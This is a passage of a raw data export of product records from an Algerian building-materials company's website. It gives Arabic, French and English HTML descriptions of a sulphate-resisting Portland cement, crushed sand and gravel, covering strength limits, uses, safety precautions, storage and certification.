<p dir="rtl" style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px">تهدف SCIMAT إلى أن تكون الشركة الأكثر أمانًا في المجتمع من خلال تحسين ظروف العمل لتجنب أي إصابات جسدية وتداعيات صحية مرتبطة بأنشطتها</span></span></p>
<p dir="rtl" style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><span style="color:#008000"><u><strong>تدابير وقائية</strong></u><strong> :</strong></span></span></span></p>
<ul dir="rtl">
<li style="text-align:left">
<p style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"> يخلط مع الماء ، والأسمنت مزعج.</span></span></p>
</li>
<li style="text-align:left">
<p style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"> تجنب ملامسة العينين والجلد؛</span></span></p>
</li>
<li style="text-align:left">
<p style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"> اغسل جميع المناطق المكشوفة على الفور بكمية كبيرة من الماء ؛</span></span></p>
</li>
<li style="text-align:left">
<p style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"> في حالة ملامسة العين لا بد من استشارة الطبيب.</span></span></p>
</li>
</ul>
<p dir="rtl" style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px">لمزيد من التفاصيل ، يرجى الرجوع إلى ورقة بيانات السلامة التفصيلية. </span></span></p>
<p dir="rtl" style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><span style="color:#008000"><u><strong>البيئة</strong></u><strong> :</strong></span></span></span></p>
<p dir="rtl" style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px">تهدف SCIMAT إلى أن تكون بشكل دائم مثالاً للمسؤولية البيئية للمجتمع من خلال حماية البيئة ، بما في ذلك منع التلوث واستخدام الموارد المستدامة من خلال :</span></span></p>
<ul dir="rtl">
<li>
<p style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"> الحفاظ على الموارد الطبيعية ؛</span></span></p>
</li>
<li>
<p style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"> الحد من انبعاثات الغلاف الجوي ؛</span></span></p>
</li>
<li>
<p style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"> التمكن من إدارة النفايات</span></span></p>
</li>
</ul>
<p dir="rtl" style="text-align:justify"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#40E0D0"><strong><u>التخزين</u> : </strong></span></span></span></p>
<p dir="rtl" style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px">يجب تخزين الأسمنت في مكان جاف وحمايته من الرطوبة</span></span><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#40E0D0"><strong></strong></span></span></span><br />
</p>
<p dir="rtl" style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><span style="color:#40E0D0"><u><strong>التكييف</strong></u><strong> : </strong></span><span style="color:#008000"><strong> </strong></span></span></span></p>
<p dir="rtl" style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px">يتم تسليم </span></span><small><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong>الاسمنت</strong></span></span></small><span style="font-size:16px"><span style="font-family:times new roman,times,serif"> <strong>CEM I / 42.5 N-LH/SR5</strong></span></span><span style="font-family:times new roman,times,serif"><span style="font-size:16px"> سائبًا وفي أكياس سعة 50 كجم. </span></span></p>
<p dir="rtl" style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><span style="color:#000080"><strong> <u>الشهادة</u> :</strong></span></span></span></p>
<p dir="rtl" style="text-align:justify"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">تم اعتماد <strong>الاسمنت</strong> <strong>CEM I / 42.5 N-LH/SR5</strong> وفقًا للمعيار الجزائري <strong>2013/442</strong> مع علامة المطابقة الوطنية <strong>TEDJ</strong> الصادرة عن المعهد الجزائري للتقييس</span></span></p>
</div>
</div>
',
'contenu_en' => '<p style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#008000"><u><strong>Composition</strong></u><strong> :</strong></span></span></span></p>
<p style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>The Cement CEM I / 42.5 N-LH / SR5 -NA 442 / 2013</strong>- is a Portland Cement resulting from the grinding of clinker and calcium sulphate (gypsum or anhydrite) to regulate the setting, and possibly secondary constituents in small quantities at 5 %. The clinker content is at least 95%.</span></span></p>
<p style="text-align:center"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><span style="color:#008000"><strong>Compressive strength limit value for CEM I 42.5N SR 5</strong></span></span></span></p>
<div style="clear:both;">
<table align="center" border="1" cellpadding="0" cellspacing="0" style="height:370px; width:425px">
<tbody>
<tr>
<td style="height:104px; width:117px">
<p style="text-align:center"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>Resistance Class</strong></span></span></p>
<p style="text-align:center"> </p>
</td>
<td style="height:104px; width:145px">
<pre style="text-align:center">
<span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong>Limit of Resistance according to the Standard NA 442
</strong></span></span></pre>
</td>
<td style="height:104px; width:123px">
<p style="text-align:center"><strong><span style="font-family:times new roman,times,serif"><span style="font-size:16px">Specified Lower Limit<br />
of our Cement</span></span></strong></p>
<p style="text-align:center"> </p>
</td>
<td style="height:104px; width:139px">
<p style="text-align:center"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong>Specified Upper Limit of our Cement</strong></span></span></p>
</td>
</tr>
<tr>
<td style="height:30px; width:117px">
<p style="text-align:center"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong>02 days</strong></span></span></p>
</td>
<td style="height:30px; width:145px">
<p style="text-align:center"> </p>
<p style="text-align:center"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>≥ 10,0</strong></span></span></p>
<p style="text-align:center"> </p>
</td>
<td style="height:30px; width:123px">
<p style="text-align:center"><small><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>21,36</strong></span></span></small></p>
</td>
<td style="height:30px; width:139px">
<p style="text-align:center"><strong><span style="font-family:times new roman,times,serif"><span style="font-size:16px">27,71</span></span></strong></p>
</td>
</tr>
<tr>
<td style="height:51px; width:117px">
<p style="text-align:center"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong>28 days</strong></span></span></p>
</td>
<td style="height:51px; width:145px">
<p style="text-align:center"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong><span style="color:black">62.5≤res≥42,5</span></strong></span></span></p>
</td>
<td style="height:51px; width:123px">
<p style="text-align:center"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong><span style="color:black">44,82</span></strong></span></span></p>
</td>
<td style="height:51px; width:139px">
<p style="text-align:center"><strong><span style="font-family:times new roman,times,serif"><span style="font-size:16px">54,53</span></span></strong></p>
</td>
</tr>
</tbody>
</table>
<div style="clear:both;"> </div>
<div style="clear:both;">
<div class="tw-ta-container hide-focus-ring tw-nfl" id="tw-target-text-container">
<p style="text-align:left"><span style="color:#000000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">The chemical properties, which are an important factor in the resistance of concrete to aggressive environments, concern the sulfuric anhydride (SO3) content of less than 3.0% (3.5% for classes 42.5 R and 52.5) and in chloride ions less than 0.10%.</span></span></span></p>
<p style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#008000"><u><strong>Quality Control</strong></u><strong> :</strong></span></span></span></p>
<p style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">SCIMAT manufactures and markets <strong>Quality</strong> Cements in accordance with Algerian Standards in force. They are periodically checked by the Center for Studies and Technological Services of the Building Materials Industry -CETIM- (accredited according to the ISO 17025 Standard).</span></span></p>
<p style="text-align:left"><small><span style="color:#008000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><u><strong>Main fields of employment</strong></u><strong> :</strong></span></span></span></small></p>
<p style="text-align:left"><span style="color:#000000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">The <strong>Cement CEM I / 42.5 N-LH / SR5</strong> is suitable for reinforced concrete or prestressed concrete, on the other hand its mechanical characteristics do not generally justify its use for ordinary masonry work and large mass or weakly reinforced concrete.<br />
<strong>The Cement CEM I / 42.5 N-LH / SR5</strong> allows appreciable rapid stripping, especially in prefabrication.<br />
For work in an aggressive environment, sea water or sulphated water, Portland Cement CEM I 42.5 N-LH / SR5 will be used respectively for work at sea PM, or for work in water with a high content of ES sulphates.</span></span></span></p>
<p style="text-align:left"><span style="color:#008000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong><u>Special precautions</u> :</strong></span></span></span></p>
<p style="text-align:left"><span style="color:#000000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">For massive structures, avoid the use of the<strong> Cement CEM I 42.5 N-LH / SR5</strong>, the heat of hydration of which may lead to an excessive rise in temperature during their construction.</span></span></span></p>
<p style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#008000"><u><strong>Specific and General Recommendations</strong></u><strong> :</strong></span></span></span></p>
<ul>
<li style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"> Use clean aggregates, free from organic matter;</span></span></li>
<li style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"> Respect the dosages and the rules of the art for the<br />
implementation;</span></span></li>
<li style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"> Aim for a Water /Cement ratio, preferably as low<br />
as possible, compatible with good rheology of<br />
fresh concrete;</span></span></li>
<li style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"> Use standardized adjuvants;</span></span></li>
<li style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"> Avoid premature drying out in hot or windy weather by curing the concrete (watering, damp tarpaulin, curing products, etc.); </span></span></li>
<li style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"> Adapt the vibration of the concrete to its consistency<br />
to obtain optimum compactness without segregation;</span></span></li>
<li style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"> Avoid all contact with skin and eyes;</span></span></li>
<li style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"> Use suitable equipment : gloves, waterproof shoes, glasses, etc.</span></span></li>
</ul>
<p style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#FF0000"><strong><u>Security</u> :</strong></span></span></span></p>
<p style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">The SCIMAT aims to be the safest employer in the Society by improving working conditions to avoid any bodily injury and health repercussions related to its activities.</span></span></p>
<p style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#008000"><u><strong>Protective Measures</strong></u><strong> :</strong></span></span></span></p>
<ul>
<li style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000"> Mix with water, the Cement is irritating;</span></span></span></li>
<li style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000"> Avoid contact with eyes and skin;</span></span></span></li>
<li style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000"> Immediately wash all exposed areas with plenty of water;</span></span></span></li>
<li style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000"> In the event of contact with the eyes, it is essential to consult a doctor.</span></span></span></li>
</ul>
<p style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000">For more details, please refer to the detailed Safety Data Sheet.</span></span></span></p>
<p style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><u><strong><span style="color:#008000">Environment</span></strong></u><strong><span style="color:#008000"> :</span></strong></span></span></p>
<p style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000">The SCIMAT aims to be a constant example of the ecological responsibility of the </span>Society<span style="color:#000000"> through the protection of the environment, including the prevention of pollution and the use of sustainable resources by:</span></span></span></p>
<ul>
<li style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000"> Preservation of natural resources;</span></span></span></li>
<li style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000"> Reduction of atmospheric emissions;</span></span></span></li>
<li style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000"> Mastery of waste management.</span></span></span></li>
</ul>
<p style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#40E0D0"><u><strong>Storage</strong></u><strong> :</strong></span></span></span></p>
<p style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">The Cement must be stored in a dry place and protected from humidity.</span></span></p>
<p style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#40E0D0"><strong><u>Conditioning</u> :</strong></span><br />
The </span></span><span style="color:#000000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"> <strong>Cement CEM I / 42.5 N-LH / SR5</strong></span></span></span><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>-NA 442/2013-</strong> is delivered in bulk and in bags of 50 kg.</span></span></p>
<p style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><u><strong><span style="color:#4B0082">Certification</span></strong></u><strong><span style="color:#4B0082"> :</span></strong></span></span></p>
<p style="text-align:left"><span style="color:#000000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">The <strong>Cement CEM I / 42.5 N-LH / SR5</strong></span></span></span><span style="font-size:16px"><span style="font-family:times new roman,times,serif"> is certified according to the <strong>Algerian Standard 442/2013</strong> with the National Conformity Mark <strong>TEDJ</strong> issued by the Algerian Institute for Standardization -IANOR-.</span></span></p>
</div>
<div class="tw-ta-container hide-focus-ring tw-nfl" id="tw-target-rmn-container">
<p style="text-align:left"> </p>
</div>
<p> </p>
</div>
</div>
',
'img_prd' => 'produit-1716888919.png',
'img_prd_detail' => '',
'Code_Pr' => '89963',
'prix_u' => '0',
'fiche_technique' => 'fiche_technique-1709106473.pdf',
'pos_slider' => '8'
),
'Environement' => array(),
'Pemploi' => array(),
'Securite' => array(),
'Specification' => array(),
'Stockage' => array(),
'typecomposition' => array(),
'Caracteristique' => array(),
'Controlequalite' => array()
),
(int) 2 => array(
'Produit' => array(
'id' => '959',
'nom_fr' => 'Sable Concassé ',
'nom_ara' => 'حصى ',
'nom_en' => 'Gravel ',
'sous_nom_fr' => ' 0/4 mm',
'sous_nom_ara' => ' مم 0/4',
'sous_nom_en' => '0/4 mm',
'date_ajout' => '2021-01-27',
'image' => '',
'contenu_fr' => '<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif">Le <strong>Sable Concassé 0/4 mm</strong> est un granulat d’origine minérale n’ayant subi aucune transformation autre que mécanique des roches massives est obtenu en exploitant des gisements de calcaire, en concassant du calcaire abattu y compris le concassage et le criblage et le broyage.</span></span></p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif">Le <strong>Sable Concassé 0/4 mm </strong> est contrôlé selon le Référentiel <strong>NA 5113</strong>.</span></span></p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#008000"><strong><u>Utilisations</u> :</strong></span></span></span></p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif">Le <strong>Sable Concassé 0/4 mm </strong>est<strong> </strong>utilisé lié avec du ciment ou du bitume.Il représente 80 à 90 % des mortiers et bétons hydrauliques destinés aux bâtiments et ouvrages d’art, mais aussi des enrobés et graves traitées destinés aux assises de chaussées et des voies ferroviaires.</span></span></p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif">Le <span style="color:#000000"><strong>Sable Concassé 0/4 mm </strong></span><strong> </strong> entre dans les :</span></span></p>
<ul>
<li>
<p><span style="color:#000000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>Travaux de Génie Civil</strong></span></span></span></p>
</li>
<li>
<p><span style="color:#000000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>Mortiers</strong></span></span></span></p>
</li>
<li>
<p><span style="color:#000000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>Bétons Hydrauliques</strong> </span></span></span></p>
</li>
<li>
<p><span style="color:#000000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>Enrobés</strong> <strong>Bitumineux</strong> (Construction des Chaussées)</span></span></span></p>
</li>
</ul>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#008000"><strong><u>Recommandations</u> :</strong></span></span></span></p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif">La qualité d’une fourniture du <strong>Sable Concassé 0/4 mm </strong>, c’est non seulement le respect des exigences du marché, mais c’est avant tout l’homogénéité des caractéristiques contrôlées. Cette régularité constitue d’ailleurs l’une des clés de la réussite du chantier. </span></span></p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif">Pour le maître d’ouvrage, tout cela implique de fixer des spécifications d’usage adaptées à ses propres besoins, d’utiliser du <strong>Sable Concassé 0/4 mm</strong> répondant au mieux à ses critères de choix, et d’effectuer tous les contrôles nécessaires pour vérifier que le <strong>Sable Concassé 0/4 mm </strong> est conforme à son attente et a en plus cette régularité tant recherchée.</span></span></p>
',
'contenu_ara' => '<p dir="rtl" style="text-align: justify;"><span style="font-family:times new roman,times,serif"><span style="font-family:times new roman,times,serif"> </span><strong><span style="font-size:16px">حصى </span></strong></span><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>0/4 مم</strong> عبارة عن مجموع من أصل معدني لم يخضع لأي تحول بخلاف الصخور الميكانيكية الضخمة التي يتم الحصول عليها من خلال استغلال رواسب الحجر الجيري ، وسحق الحجر الجيري المتساقط بما في ذلك التكسير والغربلة والطحن. يتم التحكم في </span></span><span style="font-family:times new roman,times,serif"><span style="font-family:times new roman,times,serif"> </span><strong><span style="font-size:16px">حصى </span></strong></span><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>0/4 مم</strong> وفقًا لمعيار<strong>NA 5113</strong>. </span></span></p>
<p dir="rtl" style="text-align: justify;"><strong><span style="color:#008000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><u>مجال الاستعمال</u></span></span></span></strong><span style="font-size:18px"><span style="color:#008000"><strong><small><span style="font-family:times new roman,times,serif">:</span></small></strong></span></span></p>
<p dir="rtl" style="text-align: justify;"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">- يستخدم </span></span><span style="font-family:times new roman,times,serif"><span style="font-family:times new roman,times,serif"> </span><strong><span style="font-size:16px">حصى </span></strong></span><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>0/4 مم</strong> مع الأسمنت أو القار ، ويمثل 80 إلى 90٪ من الملاط والخرسانة الهيدروليكية المخصصة للمباني وأعمال الهندسة المدنية ، وكذلك الأسفلت والحصى المعالجة المخصصة لأساسات الطرق والسكك الحديدية.</span></span></p>
<p dir="rtl" style="text-align: justify;"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">- يتم تضمين</span></span><span style="font-family:times new roman,times,serif"><span style="font-family:times new roman,times,serif"> </span><strong><span style="font-size:16px">حصى </span></strong></span><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>0/4 مم</strong> في:</span></span></p>
<ul dir="rtl">
<li style="text-align: justify;"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"> <strong> الأعمال المدنية</strong></span></span></li>
<li style="text-align: justify;"><strong><span style="font-size:16px"><span style="font-family:times new roman,times,serif"> مدافع الهاون</span></span></strong></li>
<li style="text-align: justify;"><strong><span style="font-size:16px"><span style="font-family:times new roman,times,serif"> الخرسانة الهيدروليكية</span></span></strong></li>
<li style="text-align: justify;"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"> <strong> الخلائط البيتومينية (تشييد الطرق)</strong></span></span></li>
</ul>
<p dir="rtl" style="text-align: justify;"><strong><span style="color:#008000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><u>التوصيات</u> :</span></span></span></strong></p>
<p dir="rtl" style="text-align: justify;"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">لا تقتصر جودة إمداد </span></span><span style="font-family:times new roman,times,serif"><strong><span style="font-size:16px">حصى 0/4</span></strong> </span><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>مم </strong>على الامتثال لمتطلبات السوق فحسب ، بل هي قبل كل شيء توافق الخصائص التي تم فحصها. هذا الاتساق هو ، علاوة على ذلك ، أحد مفاتيح نجاح موقع البناء</span></span>.</p>
<p dir="rtl" style="text-align: justify;"><span style="font-size:16px">بالنسبة للزبون ، كل هذا يتضمن تحديد مواصفات استخدام تتكيف مع احتياجاته الخاصة ، واستخدام </span><span style="font-family:times new roman,times,serif"><strong><span style="font-size:16px">حصى 0/4</span></strong> </span><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>مم</strong></span> الذي يلبي معايير الاختيار الخاصة به ، وإجراء جميع الفحوصات اللازمة للتحقق من أن </span><span style="font-family:times new roman,times,serif"><strong><span style="font-size:16px">حصى 0/4</span></strong> </span><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>مم</strong></span> يتماشى مع توقعاته ولديه أيضًا هذا الانتظام المنشود فيه كثيرًا.</span></p>
',
'contenu_en' => '<div class="tw-ta-container hide-focus-ring tw-nfl" id="tw-target-text-container">
<p style="text-align:left"><span style="font-family:times new roman,times,serif"><small><span style="font-size:16px">The</span></small><strong><small><span style="font-size:16px"> Gravel 0/4 mm</span></small></strong><span style="color:#000000"><span style="font-size:16px"> is an aggregate of mineral origin that has not undergone any transformation other than mechanical massive rocks is obtained by exploiting limestone deposits, crushing downed limestone including crushing and screening and grinding.</span></span></span></p>
<p style="text-align:left"><span style="font-family:times new roman,times,serif"><small><span style="font-size:16px">The</span></small><strong><small><span style="font-size:16px"> Gravel 0/4 mm</span></small></strong></span> <span style="font-size:16px"><span style="font-family:times new roman,times,serif">is controlled according to the <strong>NA 5113</strong> Standard.</span></span></p>
<p style="text-align:left"><span style="color:#008000"><strong><u>Uses</u> :</strong></span></p>
<p style="text-align:left"><span style="font-family:times new roman,times,serif"><small><span style="font-size:16px">The</span></small><strong><small><span style="font-size:16px"> Gravel 0/4 mm </span></small></strong><small><span style="font-size:16px">is u</span></small></span>sed bound with cement or bitumen. It represents 80 to 90% of hydraulic mortars and concretes intended for buildings and civil engineering works, but also asphalt and treated gravels intended for the foundations of roadways and railways.</p>
<p style="text-align:left"><span style="font-family:times new roman,times,serif"><small><span style="font-size:16px">The</span></small><strong><small><span style="font-size:16px"> Gravel 0/4 mm</span></small></strong></span> is included in:</p>
<ul>
<li style="text-align:left">
<p> <small><span style="font-family:times new roman,times,serif"><span style="font-size:16px"> <strong>Civil Engineering Work</strong></span></span></small></p>
</li>
<li style="text-align:left">
<p><small><span style="font-family:times new roman,times,serif"><span style="font-size:16px"> <strong>Mortars</strong></span></span></small></p>
</li>
<li style="text-align:left">
<p><small><span style="font-family:times new roman,times,serif"><span style="font-size:16px"> <strong>Hydraulic Concrete</strong></span></span></small></p>
</li>
<li style="text-align:left">
<p><small><span style="font-family:times new roman,times,serif"><span style="font-size:16px"> <strong>Bituminous Mixes (Road Construction)</strong></span></span></small></p>
</li>
</ul>
<p style="text-align:left"><span style="color:#008000"><strong><u>Recommendations</u> :</strong></span></p>
<p style="text-align:left">The quality of the <span style="font-family:times new roman,times,serif"><strong><small><span style="font-size:16px">Gravel 0/4 mm</span></small></strong></span> supply is not only compliance with market requirements, but above all, the homogeneity of the characteristics checked. This regularity is one of the keys to the success of the <small><span style="font-size:16px"><span style="font-family:times new roman,times,serif">construction site.</span></span></small></p>
<p style="text-align:left">For the client, all this involves setting usage specifications adapted to his own needs, using <span style="font-family:times new roman,times,serif"><small><span style="font-size:16px">the</span></small><strong><small><span style="font-size:16px"> Gravel 0/4 mm</span></small></strong></span> that best meets his selection criteria, and carrying out all the necessary checks to verify that the <span style="font-family:times new roman,times,serif"><strong><small><span style="font-size:16px">Gravel 0/4 mm</span></small></strong></span><strong> </strong>is in line with his expectations and also has this much sought-after regularity.</p>
</div>
',
'img_prd' => 'produit-1611822601.png',
'img_prd_detail' => '',
'Code_Pr' => '959',
'prix_u' => '0',
'fiche_technique' => 'fiche_technique-1611738453.pdf',
'pos_slider' => '7'
),
'Environement' => array(),
'Pemploi' => array(),
'Securite' => array(),
'Specification' => array(),
'Stockage' => array(),
'typecomposition' => array(),
'Caracteristique' => array(),
'Controlequalite' => array()
),
(int) 3 => array(
'Produit' => array(
'id' => '485',
'nom_fr' => 'Gravier',
'nom_ara' => 'حصى',
'nom_en' => 'Gravel',
'sous_nom_fr' => '4/8 mm',
'sous_nom_ara' => '4/8 مم',
'sous_nom_en' => '4/8 mm',
'date_ajout' => '2021-01-27',
'image' => '',
'contenu_fr' => '<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif">Le <span style="color:#000000"><strong>Gravier 4/8 mm</strong></span> est un granulat d’origine minérale n’ayant subi aucune transformation autre que mécanique des roches massives est obtenu en exploitant des gisements de calcaire, en concassant du calcaire abattu y compris le concassage et le criblage et le broyage.</span></span></p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif">Le <span style="color:#000000"><strong>Gravier 4/8 mm</strong></span> est contrôlé selon le Référentiel <strong>NA 5113</strong>.</span></span></p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#008000"><strong><u>Utilisations</u> :</strong></span></span></span></p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif">Le <span style="color:#000000"><strong>Gravier 4/8 mm </strong></span>est<strong> </strong>utilisé lié avec du ciment ou du bitume.Il représente 80 à 90 % des mortiers et bétons hydrauliques destinés aux bâtiments et ouvrages d’art, mais aussi des enrobés et graves traitées destinés aux assises de chaussées et des voies ferroviaires.</span></span></p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif">Le <span style="color:#000000"><strong>Gravier 4/8 mm</strong></span><strong> </strong> entre dans les :</span></span></p>
<ul>
<li>
<p><span style="color:#000000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>Travaux de Génie Civil</strong></span></span></span></p>
</li>
<li>
<p><span style="color:#000000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>Enrobés</strong> <strong>Bitumineux</strong> (Construction des Chaussées)</span></span></span></p>
</li>
</ul>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#008000"><strong><u>Recommandations</u> :</strong></span></span></span></p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif">La qualité d’une fourniture du <span style="color:#000000"><strong>Gravier 4/8 mm</strong></span>, c’est non seulement le respect des exigences du marché, mais c’est avant tout l’homogénéité des caractéristiques contrôlées. Cette régularité constitue d’ailleurs l’une des clés de la réussite du chantier. </span></span></p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif">Pour le maître d’ouvrage, tout cela implique de fixer des spécifications d’usage adaptées à ses propres besoins, d’utiliser du <span style="color:#000000"><strong>Gravier 4/8 mm</strong></span> répondant au mieux à ses critères de choix, et d’effectuer tous les contrôles nécessaires pour vérifier que le <span style="color:#000000"><strong>Gravier 4/8 mm</strong></span> est conforme à son attente et a en plus cette régularité tant recherchée.</span></span></p>
',
'contenu_ara' => '<p dir="rtl" style="text-align: justify;"><span style="font-family:times new roman,times,serif"><strong><span style="font-size:16px">حصى 4/8</span></strong> </span><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>مم</strong> عبارة عن مجموع من أصل معدني لم يخضع لأي تحول بخلاف الصخور الميكانيكية الضخمة التي يتم الحصول عليها من خلال استغلال رواسب الحجر الجيري ، وسحق الحجر الجيري المتساقط بما في ذلك التكسير والغربلة والطحن. يتم التحكم في </span></span><span style="font-family:times new roman,times,serif"><strong><span style="font-size:16px">حصى 4/8</span></strong> </span><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>مم</strong> وفقًا لمعيار<strong>NA 5113</strong>. </span></span></p>
<p dir="rtl" style="text-align: justify;"><span style="font-size:20px"><strong><span style="color:#008000"><small><u> </u></small></span></strong></span><strong><span style="color:#008000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><u>مجال الاستعمال</u></span></span></span></strong><span style="font-size:20px"><strong><span style="color:#008000"><small><span style="font-family:times new roman,times,serif">:</span></small></span></strong></span></p>
<p dir="rtl" style="text-align: justify;"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"> يستخدم </span></span><span style="font-family:times new roman,times,serif"><strong><span style="font-size:16px">حصى 4/8</span></strong> </span><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>مم</strong> مع الأسمنت أو القار ، ويمثل 80 إلى 90٪ من الملاط والخرسانة الهيدروليكية المخصصة للمباني وأعمال الهندسة المدنية ، وكذلك الأسفلت والحصى المعالجة المخصصة لأساسات الطرق والسكك الحديدية.</span></span></p>
<p dir="rtl" style="text-align: justify;"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">- يتم تضمين</span></span><span style="font-family:times new roman,times,serif"><strong><span style="font-size:16px">حصى 4/8</span></strong> </span><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>مم</strong> في:</span></span></p>
<ul dir="rtl">
<li style="text-align: justify;"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"> <span style="color:#000000"> <strong> الأعمال المدنية</strong></span></span></span></li>
